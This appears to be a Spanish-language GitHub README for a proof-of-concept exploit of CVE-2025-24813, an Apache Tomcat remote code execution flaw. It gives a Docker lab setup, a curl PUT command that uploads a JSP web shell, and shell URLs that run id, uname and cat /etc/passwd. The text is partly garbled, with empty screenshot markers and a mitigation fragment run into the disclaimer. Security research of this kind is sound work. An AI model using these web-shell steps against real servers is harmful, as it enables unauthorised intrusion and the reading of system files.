
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC
Este repositorio contiene una prueba de concepto (PoC) completa para CVE-2025-24813, una vulnerabilidad de Ejecución Remota de Código (RCE) en Apache Tomcat que utiliza el método HTTP PUT para desplegar un web shell malicioso JSP.
🔥 Este exploit demuestra cómo un atacante puede lograr RCE mediante la subida de archivos y la ejecución de cargas útiles en instancias de Tomcat configuradas de forma insegura.
CVE-2025-24813/
├── docker/
│ ├── Dockerfile
│ └── web.xml
├── exploit/
│ ├── 1_exploit_cve_2025_24813.py
│ └── shell.jsp
├── screenshots/
│ ├── 1_tomcat_running.png
│ ├── 2_docker_started.png
│ ├── 3_upload_shell.png
│ ├── 4_run_python_exploit.png
│ ├── 5_access_shell_whoami.png
│ ├── 6_view_etc_passwd.png
│ ├── 7_run_uname.png
│ ├── 8_run_id.png
│ └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
📸 
📸 
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
📸 
python3 exploit/1_exploit_cve_2025_24813.py
📸 
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
📸 
📸 
📸 
📸 
📸 
web.xml o en la configuración del servidorEste proyecto es solo para fines educativos y de investigación. Realizar pruebas, explotación o uso no autorizados en sistemas que no posees o sin permiso es ilegal y poco ético.
Shivshant Patil
Ethical Hacker Certificado (CEH v13)
Graduado en Ingeniería Informática (B.Tech)
🔗 LinkedIn
🔗 GitHub